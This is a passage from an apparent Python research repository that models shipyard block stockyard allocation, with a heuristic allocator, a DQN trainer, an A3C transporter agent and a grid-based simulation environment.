_cost = abs(block[0] - candidate // state.shape[1]) + abs(block[1] - candidate % state.shape[1])
else:
_cost = (candidate - 1) % state.shape[1]
if _cost < cost:
min_candidate = candidate
cost = _cost
return min_candidate
def rearrange_block(self, state, block):
target_i, target_j = block[0], block[1]
print(state)
for i in range(1, state.shape[1] - target_j):
if state[target_i, target_j + i] != 0:
candidates = self.get_candidates(state, [(target_i, target_j + i + 1)])
candidate = self.choose_candidate(state, candidates, block)
state[candidate // state.shape[1], candidate % state.shape[1]] = state[target_i, target_j + i]
state[target_i, target_j + i] = 0
self.rearrange += 1
print('rearrange: {0}'.format(self.rearrange))
print(state)
def rearrange_by_transporter(self, state, outbounds):
blocks = []
out_indices = []
for i in range(state.shape[0]):
for j in range(state.shape[1]):
if state[i, j] != 0:
blocks.append((j, i))
for outbound in outbounds:
out_indices.append(len(blocks))
blocks.append((outbound[1], outbound[0]))
blocks_clone = blocks[:]
for index in out_indices:
moves, moved_blocks = self.transporter.get_block_moves(blocks, index, 0)
blocks = moved_blocks
self.rearrange += moves
print('moves: {0}'.format(self.rearrange))
new_state = np.full(state.shape, 0)
for i, block in enumerate(blocks_clone):
new_state[blocks[i][1], blocks[i][0]] = state[block[1], block[0]]
state[:] = new_state
def check_outbound(self, state, block):
if block[1] == state.shape[1] - 1:
return True
directions = [(1, 0), (0, -1), (-1, 0), (0, 1)]
for i in range(4):
search = (block[0] + directions[i][0], block[1] + directions[i][1])
if 0 <= search[0] < state.shape[0] and 0 <= search[1] < state.shape[1]:
if state[search[0], search[1]] != 0 or search in self.checked:
continue
else:
self.checked.append(search)
if self.check_outbound(state, search):
return True
return False
if __name__ == "__main__":
abslap = HeuristicABSLAP('../data/data.csv')
arranged = abslap.arrange_blocks()
print(arranged)
```
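`get_candidates` above treats each row of the yard as a line of lots filled from one side: a lot qualifies if it is empty and its left neighbor is occupied, with the first lot of an all-empty row as a special case. A standalone sketch of that row scan (assumed semantics; the adjacency-pruning step is omitted for brevity):
```python
import numpy as np
def candidate_lots(yard):
    """Flat indices of lots where the next block could be placed."""
    candidates = []
    for i, row in enumerate(yard):
        if row.sum() == 0:  # empty row: its first lot is the candidate
            candidates.append(yard.shape[1] * i)
            continue
        for j in range(1, yard.shape[1]):
            if row[j] == 0 and row[j - 1] != 0:
                candidates.append(yard.shape[1] * i + j)
    return candidates
yard = np.array([[3, 2, 0, 0],
                 [0, 0, 0, 0]])
print(candidate_lots(yard))  # [2, 4]
```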
#### File: Block_Stockyard/model/QLearningDNN.py
```python
import numpy as np
import random
import tensorflow as tf
import matplotlib.pyplot as plt
from simulater import Environment as en
from view import ArrayView as av
import sys
import argparse
from collections import deque
import time
class QDNN:
def __init__(self, input_size, output_size, session, name):
self.session=session
self.input_size=input_size
self.output_size=output_size
self.net_name= name
self._build_network()
logdir = "../logs"
self.writer = tf.summary.FileWriter(logdir, session.graph)
#self.writer.add_graph(session.graph)
self.global_step=0
def _build_network(self, h_size=256, l_rate=1e-3):
with tf.variable_scope(self.net_name):
self._X=tf.placeholder(tf.float32, [None, self.input_size], name="input_x")
with tf.name_scope("layer1") as scope:
W1=tf.get_variable("W1", shape=[self.input_size, h_size], initializer=tf.contrib.layers.xavier_initializer())
b1=tf.get_variable("b1", shape=[1, h_size], initializer=tf.contrib.layers.xavier_initializer())
layer1=tf.nn.relu(tf.matmul(self._X, W1)+b1)
#w1_hist = tf.summary.histogram("weights1", W1)
#layer1_hist = tf.summary.histogram("layer1", layer1)
with tf.name_scope("layer2") as scope:
W2=tf.get_variable("W2", shape=[h_size, h_size], initializer=tf.contrib.layers.xavier_initializer())
b2=tf.get_variable("b2", shape=[1, h_size], initializer=tf.contrib.layers.xavier_initializer())
layer2=tf.nn.relu(tf.matmul(layer1, W2)+b2)
#w2_hist = tf.summary.histogram("weights2", W2)
#layer2_hist = tf.summary.histogram("layer2", layer2)
'''
with tf.name_scope("layer3") as scope:
W3=tf.get_variable("W3", shape=[h_size, h_size], initializer=tf.contrib.layers.xavier_initializer())
b3=tf.get_variable("b3", shape=[1, h_size], initializer=tf.contrib.layers.xavier_initializer())
layer3=tf.nn.relu(tf.matmul(layer2, W3)+b3)
#w3_hist = tf.summary.histogram("weights3", W3)
#layer3_hist = tf.summary.histogram("layer3", layer3)
with tf.name_scope("layer4") as scope:
W4=tf.get_variable("W4", shape=[h_size, h_size], initializer=tf.contrib.layers.xavier_initializer())
b4=tf.get_variable("b4", shape=[1, h_size], initializer=tf.contrib.layers.xavier_initializer())
layer4=tf.nn.relu(tf.matmul(layer3, W4)+b4)
#w4_hist = tf.summary.histogram("weights4", W4)
#layer4_hist = tf.summary.histogram("layer4", layer4)
'''
with tf.name_scope("layer5") as scope:
W5 = tf.get_variable("W5", shape=[h_size, self.output_size],
initializer=tf.contrib.layers.xavier_initializer())
b5 = tf.get_variable("b5", shape=[1, self.output_size], initializer=tf.contrib.layers.xavier_initializer())
self._Qpred = tf.matmul(layer2, W5)+b5
#w5_hist = tf.summary.histogram("weights5", W5)
#qpred_hist = tf.summary.histogram("qpred", self._Qpred)
self._Y = tf.placeholder(shape=[None, self.output_size], dtype=tf.float32)
self._loss = tf.reduce_mean(tf.square(self._Y - self._Qpred))
#loss_sum = tf.summary.scalar("loss", self._loss)
self._train = tf.train.AdamOptimizer(learning_rate=l_rate).minimize(self._loss)
#self.summary = tf.summary.merge_all()
def predict(self, state):
x = np.reshape(state, [1, self.input_size])
return self.session.run(self._Qpred, feed_dict={self._X: x})
def update(self, x_stack, y_stack):
loss, train = self.session.run([self._loss, self._train],
feed_dict={self._X: x_stack, self._Y: y_stack})
#loss, train, summary = self.session.run([self._loss, self._train, self.summary], feed_dict={self._X: x_stack, self._Y: y_stack})
#self.writer.add_summary(summary, global_step=self.global_step)
self.global_step+=1
return loss, train
def get_copy_var_ops(*, dest_scope_name="target", src_scope_name="main"):
op_holder = []
src_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=src_scope_name)
dest_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=dest_scope_name)
for src_var, dest_var in zip(src_vars, dest_vars):
op_holder.append(dest_var.assign(src_var.value()))
return op_holder
def run_training():
path="../data/data.csv"
env = en.Environment(path)
y = .99
e = 0.01
num_episodes = 50000
REPLAY_MEMORY = 100000
# create lists to contain total rewards and steps per episode
jList = []
rList = []
input_size=env.size
output_size=env.size
replay_buffer= deque()
with tf.Session() as sess:
mainDQN = QDNN(input_size, output_size, sess, "main")
targetDQN = QDNN(input_size, output_size, sess, "target")
tf.global_variables_initializer().run()
copy_ops = get_copy_var_ops(dest_scope_name="target", src_scope_name="main")
t0=time.time()
for i in range(num_episodes):
# Reset environment and get first new observation
s = env.reset()
e=1./((i/50)+1)+0.007
rAll = 0
d = False
j = 0
# The Q-Network
while j < len(env.BLOCKS):
# Choose an action by greedily (with e chance of random action) from the Q-network
s0 = [item/env.BLOCKS[j].term for item in s]
Qs = mainDQN.predict(s0)
#for k in range(len(s0[0])):
#if s0[0][k] != 0:
#Qs[0][k] = -100.0
a = np.argmax(Qs)
if np.random.rand(1) <e:
a = random.randint(0, input_size-1)
# Get new state and reward from environment
s1, r, d = env.step(a)
#s1 = np.reshape(s1, (1, s1.size))
if j<len(env.BLOCKS)-1:
s2 = [item/env.BLOCKS[j+1].term for item in s1]
else:
s2 = s1
#Save experience to buffer
replay_buffer.append((s0, a, r, s2, d))
if len(replay_buffer) > REPLAY_MEMORY:
replay_buffer.popleft()
rAll += r
s = s1
if d == True:
#rAll=-1
break
j += 1
jList.append(j)
rList.append(rAll)
print("Episode: {} steps: {} reward: {}".format(i, j, rAll))
if i % 10 == 9:
for _ in range(10):
                    # build a minibatch
minibatch = random.sample(replay_buffer, 10)
loss, _ = replay_train(mainDQN, targetDQN, minibatch)
print("Loss: ", loss)
t1=time.time()
print("Seconds: %s" %(t1-t0))
t0=t1
sess.run(copy_ops)
bot_play(mainDQN, path)
num_finish = 0
for j in jList:
if (j == len(env.BLOCKS)): num_finish += 1
print("Percent of succesful episodes: " + str(100*num_finish / num_episodes) + "%")
# av.visualize_space(env.LOGS[0])
plt.plot(rList, label='reward')
plt.plot(jList, label='steps')
plt.legend(bbox_to_anchor=(0.78, 0.98), loc=2, borderaxespad=0.)
plt.show()
if(len(env.LOGS)>0):
env.LOGS=sorted(env.LOGS, key=lambda log: log[-1])[::-1]
av.visualize_log(env.LOGS)
def bot_play(mainDQN, path):
env = en.Environment(path)
s=env.reset()
reward_sum = 0
j=0
while True:
a = np.argmax(mainDQN.predict(s))
s, reward, done= env.step(a)
reward_sum += reward
if done:
print("Total score: {}".format(reward_sum))
break
elif j==len(env.BLOCKS)-1:
print("Total score: {}".format(reward_sum))
break
j+=1
def replay_train(DQN, targetDQN, train_batch):
x_stack=np.empty(0).reshape(0, DQN.input_size)
y_stack = np.empty(0).reshape(0, DQN.output_size)
for state, action, reward, next_state, done in train_batch:
dis=.9
Q=DQN.predict(state)
if(done):
Q[0, action] = reward
else:
Q[0, action] = reward + dis*np.max(targetDQN.predict(next_state))
y_stack = np.vstack([y_stack, Q])
x_stack = np.vstack([x_stack, state])
return DQN.update(x_stack, y_stack)
def simple_replay_train(DQN, train_batch):
x_stack=np.empty(0).reshape(0, DQN.input_size)
y_stack = np.empty(0).reshape(0, DQN.output_size)
for state, action, reward, next_state, done in train_batch:
dis=.9
Q=DQN.predict(state)
if(done):
Q[0, action] = reward
else:
Q[0, action] = reward + dis*np.max(DQN.predict(next_state))
y_stack = np.vstack([y_stack, Q])
x_stack = np.vstack([x_stack, state])
return DQN.update(x_stack, y_stack)
def main(_):
run_training()
if __name__ == '__main__':
tf.app.run(main=main)
```
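`replay_train` and `simple_replay_train` build their regression targets with the standard Q-learning backup: the chosen action's target is `r` on terminal transitions and `r + gamma * max_a' Q(s', a')` otherwise. A minimal NumPy sketch of that target construction, with hypothetical Q values standing in for the network predictions:
```python
import numpy as np
gamma = 0.9
q_main = np.array([[0.2, 0.5, 0.1]])         # Q(s, .) from the main net
q_target_next = np.array([[0.3, 0.9, 0.0]])  # Q(s', .) from the target net
action, reward, done = 1, 1.0, False
y = q_main.copy()
y[0, action] = reward if done else reward + gamma * q_target_next.max()
print(y)  # [[0.2, 1.81, 0.1]] -- only the taken action's entry is re-targeted
```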
#### File: Block_Stockyard/model/trained_transporter.py
```python
import tensorflow as tf
import tensorflow.contrib.slim as slim
import scipy.signal
import numpy as np
from simulater.InNOutSpace import Space
from model.helper import *
def update_target_graph(from_scope,to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
op_holder = []
for from_var,to_var in zip(from_vars,to_vars):
op_holder.append(to_var.assign(from_var))
return op_holder
# Processes Doom screen image to produce cropped and resized image.
def process_frame(frame):
'''
s = frame[10:-10,30:-30]
s = scipy.misc.imresize(s,[84,84])
s = np.reshape(s,[np.prod(s.shape)]) / 255.0
'''
s = frame.flatten()
return s
# Discounting function used to calculate discounted returns.
def discount(x, gamma):
return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1]
#Used to initialize weights for policy and value output layers
def normalized_columns_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
class AC_Network():
def __init__(self, s_size, a_size, scope):
width, height = s_size[0], s_size[1]
s_size = height * width
with tf.variable_scope(scope):
# Input and visual encoding layers
self.inputs = tf.placeholder(shape=[None, s_size], dtype=tf.float32)
self.imageIn = tf.reshape(self.inputs, shape=[-1, height, width, 1])
self.conv1 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.imageIn, num_outputs=16,
kernel_size=[2, 2], stride=[1, 1], padding='SAME')
self.conv2 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.conv1, num_outputs=32,
kernel_size=[2, 2], stride=[1, 1], padding='SAME')
hidden = slim.fully_connected(slim.flatten(self.conv2), 256, activation_fn=tf.nn.elu)
# Recurrent network for temporal dependencies
lstm_cell = tf.contrib.rnn.BasicLSTMCell(256, state_is_tuple=True)
c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)
h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)
self.state_init = [c_init, h_init]
c_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])
h_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])
self.state_in = (c_in, h_in)
rnn_in = tf.expand_dims(hidden, [0])
step_size = tf.shape(self.imageIn)[:1]
state_in = tf.contrib.rnn.LSTMStateTuple(c_in, h_in)
lstm_outputs, lstm_state = tf.nn.dynamic_rnn(
lstm_cell, rnn_in, initial_state=state_in, sequence_length=step_size,
time_major=False)
lstm_c, lstm_h = lstm_state
self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
rnn_out = tf.reshape(lstm_outputs, [-1, 256])
# Output layers for policy and value estimations
self.policy = slim.fully_connected(rnn_out, a_size,
activation_fn=tf.nn.softmax,
weights_initializer=normalized_columns_initializer(0.01),
biases_initializer=None)
self.value = slim.fully_connected(rnn_out, 1,
activation_fn=None,
weights_initializer=normalized_columns_initializer(1.0),
biases_initializer=None)
'''
# Only the worker network need ops for loss functions and gradient updating.
if scope != 'global':
self.actions = tf.placeholder(shape=[None], dtype=tf.int32)
self.actions_onehot = tf.one_hot(self.actions, a_size, dtype=tf.float32)
self.target_v = tf.placeholder(shape=[None], dtype=tf.float32)
self.advantages = tf.placeholder(shape=[None], dtype=tf.float32)
self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
# Loss functions
self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1])))
self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy))
self.policy_loss = -tf.reduce_sum(tf.log(self.responsible_outputs) * self.advantages)
self.loss = 0.5 * self.value_loss + self.policy_loss - self.entropy * 0.01
# Get gradients from local network using local losses
local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
self.gradients = tf.gradients(self.loss, local_vars)
self.var_norms = tf.global_norm(local_vars)
grads, self.grad_norms = tf.clip_by_global_norm(self.gradients, 40.0)
# Apply local gradients to global network
global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global')
self.apply_grads = trainer.apply_gradients(zip(grads, global_vars))
'''
class Transporter():
def __init__(self, sess, width, height, a_size=5, mode=0):
self.width = width
self.height = height
s_size = (self.width, self.height)
self.mode = mode
self.name = 'tp'
model_path = '../SavedModels/A3C/%d-%d-%d' % (self.width, self.height, mode)
self.env = {}
self.long_images = []
self.long_counts = []
self.num_move = 0
with tf.device("/cpu:0"):
#global_episodes = tf.Variable(0, dtype=tf.int32, name='global_episodes', trainable=False)
#trainer = tf.train.AdamOptimizer(learning_rate=1e-4)
master_network = AC_Network(s_size, a_size, 'global') # Generate global network
variables = slim.get_variables_to_restore()
variables_to_restore = [v for v in variables if v.name.split('/')[0] == 'global']
saver = tf.train.Saver(variables_to_restore)
print('Loading Model...')
ckpt = tf.train.get_checkpoint_state(model_path)
saver.restore(sess, ckpt.model_checkpoint_path)
self.local_AC = master_network
#self.update_local_ops = update_target_graph('global', self.name)
        self.actions = np.identity(a_size, dtype=bool).tolist()  # duplicate assignment removed
self.sess = sess
def get_block_moves(self, blocks, target, name):
#self.env = Space(self.width, self.height, goal=self.mode, block_indices=blocks, target=target, allocation_mode=True)
self.env[name] = Space(self.width, self.height, goal=self.mode, block_indices=blocks, target=target, allocation_mode=True)
env = self.env[name]
self.work(env)
moves = self.env[name].block_moves
blocks = self.env[name].blocks
return moves, blocks
def work(self, env):
sess = self.sess
with sess.as_default(), sess.graph.as_default():
#sess.run(self.update_local_ops)
#episode_buffer = []
#episode_values = []
episode_frames = []
episode_reward = 0
episode_step_count = 0
d = False
#self.env.new_episode()
s = env.get_state()
#s = self.env.get_state().screen_buffer
s = process_frame(s)
s2 = s.reshape([7, 5])
episode_frames.append(s2)
rnn_state = self.local_AC.state_init
self.batch_rnn_state = rnn_state
#while self.env.is_episode_finished() == False:
while d == False:
# Take an action using probabilities from policy network output.
a_dist, v, rnn_state = sess.run(
[self.local_AC.policy, self.local_AC.value, self.local_AC.state_out],
feed_dict={self.local_AC.inputs: [s],
self.local_AC.state_in[0]: rnn_state[0],
self.local_AC.state_in[1]: rnn_state[1]})
a = np.random.choice(a_dist[0], p=a_dist[0])
a = np.argmax(a_dist == a)
#print(s.reshape([3, 4]))
#print(a)
s1, r, d = env.step(a)
if d == False:
#s1 = self.env.get_state().screen_buffer
episode_frames.append(s1)
s1 = process_frame(s1)
else:
s1 = s
#episode_buffer.append([s, a, r, s1, d, v[0, 0]])
#episode_values.append(v[0, 0])
episode_reward += r
s = s1
episode_step_count += 1
if episode_step_count > 1000:
env.block_moves = 100
#print(str(s) + str(len(env.blocks)))
break
if d == True and False:
images = np.array(episode_frames)
self.num_move += env.block_moves
if images.shape[1] != 3:
images = color_frame(images)
big_images = []
for image in images:
big_images.append(scipy.misc.imresize(image, [self.width*30, self.height*30], interp='nearest'))
self.long_images.append(scipy.misc.imresize(image, [self.width*30, self.height*30], interp='nearest'))
self.long_counts.append(self.num_move)
# If the episode hasn't ended, but the experience buffer is full, then we
# make an update step using that experience rollout.
#if len(episode_buffer) == 30 and d != True :
#episode_buffer = []
if d == True:
break
def make_long_gif(self):
time_per_step = 0.1
#make_gif(self.long_images, '../frames/Alloc/%d-%d-%s/image' % (self.width, self.height, '30') + '_long.gif',
# duration=len(self.long_images) * time_per_step, true_image=True, salience=False)
make_gif_with_count(self.long_images, self.long_counts, '../frames/Alloc/%d-%d-%s/image' % (self.width, self.height, '30') + '_long.gif',
duration=len(self.long_images) * time_per_step, true_image=True, salience=False)
self.long_images = []
self.num_move = 0
```
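The action selection in `work` uses a two-step idiom: it draws a probability value from the policy distribution and then recovers its index with `argmax`. The sketch below contrasts that with the direct one-liner; the two agree except when several actions share exactly the same probability (distribution values here are hypothetical):
```python
import numpy as np
p = np.array([0.1, 0.6, 0.3])                  # policy output for one state
value = np.random.choice(p, p=p)               # idiom from work(): sample a probability value...
a_indirect = int(np.argmax(p == value))        # ...then locate its index
a_direct = int(np.random.choice(len(p), p=p))  # direct equivalent
print(a_indirect, a_direct)
```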
#### File: Block_Stockyard/simulater/Environment.py
```python
from simulater import Block as bl
from simulater import Space as sp
from simulater import DataManager as dm
import numpy as np
import operator
import datetime
import copy
class Environment:
def __init__(self, filepath, width=6, height=4, name='', num_blocks=50):
        # Load the input data and store it in member variables
space, blocks = dm.import_data(filepath, width, height, num_blocks)
self.NUM_BLOCKS = num_blocks
self.BLOCKS = sorted(blocks, key=operator.attrgetter('_startdate'))
self.height = space.height
self.width = space.width
self.space_name = space.name
self.size = self.height * self.width
self.LOGS = []
self.cumulate = np.zeros([self.width, self.height])
self.name = str(name)
self._initialize()
def _initialize(self):
        # Reset the space information at the start of every episode
self.SPACE = sp.Space(self.width, self.height, self.space_name)
#blocks = dm.generate_blocks(self.NUM_BLOCKS)
#self.BLOCKS = sorted(blocks, key=operator.attrgetter('_startdate'))
self.SPACE.update_blocks(copy.deepcopy(self.BLOCKS))
self.STAGE = 0
def reset(self):
        # Reset the environment and return the initial state
self._initialize()
status = self.SPACE.get_status(0)
status = np.reshape(status, (1, status.size))
return status
def step(self, action):
blocks = self.SPACE.get_blocks()
num_blocks = len(blocks)
reward = 0
restart = False
'''
        # Section that forces actual (as-performed) plan placements
if blocks[self.STAGE].fixed != -1:
action = blocks[self.STAGE].fixed
while self.get_state()[int(action / self.height), int(action % self.height)] != -1.0:
action += 1
if action == 25:
action = 0
'''
x_loc = int(action / self.height)
y_loc = int(action % self.height)
blocks[self.STAGE].set_location(x_loc, y_loc)
#self.SPACE.update_blocks(blocks)
        # Keep the un-normalized state before the block move and use it for the TP move
#state = self.SPACE.get_status(max(0, self.STAGE - 1))
        # Update the state
is_arrangible, _ = self.SPACE.update_state_lot(self.STAGE)
if is_arrangible:
            # InNOutSpace uses a different coordinate order, so pass (y, x)
# r = self.get_reward(state, (y_loc, x_loc))
# r = self.transport_block(state, (y_loc, x_loc))
r = 1
reward += r
self.STAGE += 1
reward += 0
self.LOGS.append(self.SPACE.RESULTS[-1])
rewards = None
if not is_arrangible:
# self._initialize()
reward = -1
restart = True
self.reset()
elif self.STAGE == num_blocks:
restart = True
reward += 3
rewards = self.substep()
self.reset()
# self._initialize()
else:
rewards = self.substep()
status = self.get_state()
return status, reward, restart, rewards
    # Between steps, check whether any block must leave and perform the rearrangement
def substep(self):
current_day = self.SPACE.event_in[self.STAGE - 1]
next_day = datetime.datetime(datetime.MAXYEAR, 1, 1)
if len(self.SPACE.event_in) != self.STAGE:
next_day = self.SPACE.event_in[self.STAGE]
if current_day == next_day:
return
transfers = []
out_events = sorted(self.SPACE.event_out, key=lambda out: out[0])
for i in range(self.STAGE):
if current_day < out_events[i][0] <= next_day:
transfers.append(out_events[i])
if len(transfers) == 0:
return
current_blocks = []
blocks = self.SPACE.get_blocks()
for block in blocks:
start, end = block.get_schedule()
if start <= current_day < end:
current_blocks.append(block)
rewards = {}
for transfer in transfers:
state = self.SPACE.get_status(max(0, self.STAGE - 1))
x_loc, y_loc = transfer[1].get_location()
r = self.transport_block(state, (x_loc, y_loc), current_blocks)
for i in range(len(blocks)):
if transfer[1].name == blocks[i].name:
rewards[i] = r
return rewards
def get_state(self):
state = self.SPACE.get_status(max(0, self.STAGE - 1))
# state = self.SPACE.RESULTS[-1]
state = self.normalize_state(state, self.STAGE)
return state
def normalize_state(self, state, stage):
norm_state = np.array(state)
blocks = self.SPACE.get_blocks()
if len(blocks) == stage:
stage += -1
duration = blocks[stage].term
for i in range(norm_state.shape[0]):
for j in range(norm_state.shape[1]):
if norm_state[i, j] != -1.0:
norm_state[i, j] = norm_state[i, j] / duration
if norm_state[i, j] >= 3:
norm_state[i, j] = 3.0
return norm_state
def set_transporter(self, transporter):
self.Transporter = transporter
def get_reward(self, state, target):
blocks = []
for i in range(state.shape[0]):
for j in range(state.shape[1]):
if state[i, j] != -1.0:
blocks.append(np.array([j, i]))
moves, _ = self.Transporter.get_block_moves(blocks, target)
reward = max(0, 3 - moves)
return reward
def transport_block(self, state, target, current_blocks):
blocks = []
terms = []
index_curr = []
#terms.append(self.BLOCKS[self.STAGE].term)
index = -1
index_target = -1
for i in range(state.shape[0]):
for j in range(state.shape[1]):
if state[i, j] != -1.0:
index += 1
blocks.append(np.array([i, j]))
terms.append(state[i, j])
if i == target[0] and j == target[1]:
index_target = index
for k in range(len(current_blocks)):
x, y = current_blocks[k].get_location()
if x == i and y == j:
index_curr.append(k)
if index_target == -1:
print('here')
moves, moved_blocks = self.Transporter.get_block_moves(blocks, index_target, self.name)
#moved_blocks.append(moved_blocks.pop(0))
moved_state = np.full(state.shape, -1.0, dtype=float)
try:
for i in range(len(moved_blocks)):
if i == index_target:
continue
current_blocks[index_curr[i]].set_location(moved_blocks[i][0], moved_blocks[i][1])
moved_state[moved_blocks[i][0], moved_blocks[i][1]] = terms[i] - terms[index_target]
self.SPACE.modify_latest_state(moved_state)
self.LOGS.append(self.SPACE.RESULTS[-1])
del current_blocks[index_curr[index_target]]
except:
print('here')
if moves == 0:
reward = 2
else:
reward = max(0, 1/moves)
print(moves)
return reward
```
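`normalize_state` rescales each occupied lot by the incoming block's duration and caps the ratio at 3, so the agent sees dwell times relative to the block being placed rather than absolute days. A standalone sketch of that transform (assumed semantics; empty lots are encoded as -1):
```python
import numpy as np
def normalize(state, duration):
    norm = state.astype(float).copy()
    mask = norm != -1.0
    norm[mask] = np.minimum(norm[mask] / duration, 3.0)
    return norm
state = np.array([[-1.0, 10.0],
                  [40.0, 5.0]])
print(normalize(state, duration=10.0))  # [[-1.  1.] [ 3.  0.5]]
```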
#### File: Block_Stockyard/simulater/InNOutSpace.py
```python
import numpy as np
import random
class Space:
def __init__(self, width, height, num_block=0, goal=1, block_indices=[], target=-1, allocation_mode=False):
self.width = width
self.height = height
self.grab = -1
self.stage = 0
self.mode = goal
self.goal = goal
        # goal 0 means taking a block out, 1 means bringing one in, 2 means random
if goal == 2:
self.goal = random.randint(0, 1)
self.is_grab = False
self.action_space = Action(5)
self.ale = Ale()
self.stopped = 0
self.block_moves = 0
        # When linked with block allocation, the value below is set to True
self.allocation_mode = allocation_mode
blocks = []
self.num_block=num_block
        # Fill in block coordinates, covering both fixed and random block positions
if type(num_block) is not int:
nblock = random.randint(num_block[0], num_block[1])
block_indices = random.sample(range((width) * height), nblock)
for index in block_indices:
                x = index % width
                y = index // width
blocks.append(np.array([x, y]))
else:
for sample in block_indices:
x, y = sample[0], sample[1]
blocks.append(np.array([x, y]))
#if len(blocks) == 0:
# blocks.append(np.array([-1, -1]))
self.blocks = blocks
self.road = []
for i in range(height):
self.road.append(np.array([width - 1, i]))
self.car = self.road[0]
self.target = target
self.reward = 0
if self.goal == 1:
if allocation_mode:
                # In allocation mode the target is fixed; add the target block on the road
self.target_pos = target
self.blocks.insert(0, self.road[0])
else:
                # In random mode the 0th random block position is the target; the target block starts on the road
self.target_pos = blocks[0]
self.blocks[0] = self.road[0]
self.grab_block()
self.stage += -1
def get_state(self):
empty = -1
emplty_road = -2
target = 0
normal_block = 1
target_block = 2
normal_ontarget = 3
tp = 4
tp_onblock = 5
tp_onblock_target = 6
tp_carrying = 7
tp_carrying_target = 8
state = np.full([self.height, self.width], empty)
i = 0
        # goal=1 brings a block in; goal=0 takes one out
for road in self.road:
state[road[1], road[0]] = target
if self.goal == 1:
for road in self.road:
state[road[1], road[0]] = emplty_road
state[self.target_pos[1], self.target_pos[0]] = target
for block in self.blocks:
if i == self.target:
state[block[1], block[0]] = target_block
else:
if state[block[1], block[0]] == target:
state[block[1], block[0]] = normal_ontarget
else:
state[block[1], block[0]] = normal_block
i += 1
        # No block under the transporter
if state[self.car[1], self.car[0]] < normal_block:
state[self.car[1], self.car[0]] = tp
else:
if state[self.car[1], self.car[0]] == normal_block:
if self.is_grab:
state[self.car[1], self.car[0]] = tp_carrying
else:
state[self.car[1], self.car[0]] = tp_onblock
elif state[self.car[1], self.car[0]] == target_block:
if self.is_grab:
state[self.car[1], self.car[0]] = tp_carrying_target
else:
state[self.car[1], self.car[0]] = tp_onblock_target
return state
def is_movable(self, x_change, y_change):
movable = True
x = self.car[0] + x_change
y = self.car[1] + y_change
if x_change==0 and y_change==0:
movable = False
elif abs(x_change) + abs(y_change) > 1:
movable = False
elif x > self.width - 1:
movable =False
elif x < 0:
movable = False
elif y > self.height - 1:
movable = False
elif y < 0:
movable = False
if self.grab > -1:
for block in self.blocks:
if block[0] == x and block[1] ==y:
movable = False
break
return movable
def move_car(self, x_change, y_change):
x = self.car[0] + x_change
y = self.car[1] + y_change
self.car = np.array([x, y])
if self.grab > -1:
self.blocks[self.grab] = np.array([x, y])
self.stage += 1
if self.goal == 0:
for _road in self.road:
if np.array_equal(self.blocks[self.target], _road):
#self.reward = 1
return True
elif self.goal == 1:
if np.array_equal(self.blocks[self.target], self.target_pos):
on_road = False
for i in range(len(self.blocks)):
if i == self.target:
continue
for road in self.road:
if np.array_equal(self.blocks[i], road):
on_road = True
if on_road:
return False
#self.reward = 1
return True
return False
def grab_block(self):
if self.grab != -1:
return
i = 0
for block in self.blocks:
if np.array_equal(block, self.car):
self.grab = i
self.stage += 1
self.is_grab = True
self.block_moves += 1
#if self.grab == 0:
# self.reward = 0.5
return
i += 1
def release_block(self):
if self.grab != -1:
self.grab = -1
self.stage += 1
self.is_grab = False
def step(self, action):
#print(self.get_state())
max_reward = 30
self.reward = 0
x_change = 0
y_change = 0
if action == 0:
y_change += -1
elif action == 1:
y_change += 1
elif action == 2:
x_change += -1
elif action == 3:
x_change += 1
elif action == 4:
if self.is_grab:
self.release_block()
else:
self.grab_block()
terminal = False
if self.is_movable(x_change, y_change):
if self.move_car(x_change, y_change):
#self.reward = max_reward - self.stage
#if self.reward < 10:
# self.reward = 10
self.reward = 1
terminal = True
self.stopped = 0
else:
self.stage += 1
self.stopped += 1
#self.reward += -0.1
state = self.get_state()
reward = self.reward
if self.stopped > 5 and not self.allocation_mode:
terminal = True
#reward = -1
#if self.reward == 1:
#terminal = True
if terminal:
#print(self.block_moves)
#print(self.stage)
if not self.allocation_mode:
self.__init__(self.width, self.height, self.num_block, self.mode, target=self.target)
'''
print(action)
print([x_change, y_change])
print(self.is_grab)
print(state)
print(reward)
print(terminal)
print('*'*30)
'''
return state, reward, terminal
class Action:
def __init__(self, n):
self.n = n
class Ale:
def lives(self):
return 1
```
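`get_state` flattens the whole scene into one integer grid, with the constants at the top of the method acting as a legend. A small sketch that decodes one such grid with that legend (cell values copied from the method; the example layout itself is hypothetical):
```python
import numpy as np
LEGEND = {-2: 'empty road', -1: 'empty lot', 0: 'target cell',
          1: 'block', 2: 'target block', 3: 'block on target cell',
          4: 'transporter', 5: 'transporter on block',
          6: 'transporter on target block', 7: 'transporter carrying block',
          8: 'transporter carrying target block'}
state = np.array([[-1, 1, -2],
                  [2, 4, 0]])
for code in np.unique(state):
    print(int(code), '->', LEGEND[int(code)])
```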
#### File: Block_Stockyard/simulater/Space.py
```python
import numpy as np
from copy import deepcopy
import datetime
class Space:
def __init__(self, width, height, name):
self.width=width
self.height=height
self.name=name
self.RESULTS=[]
self.status = np.full((self.width, self.height), -1.0, dtype=float)
    # Update the block information assigned to the space and the in/out schedules
def update_blocks(self, blocks):
events = []
event_in=[]
event_out=[]
for block in blocks:
start, end = block.get_schedule()
events.append(start)
events.append(end)
event_in.append(start)
event_out.append([end, block])
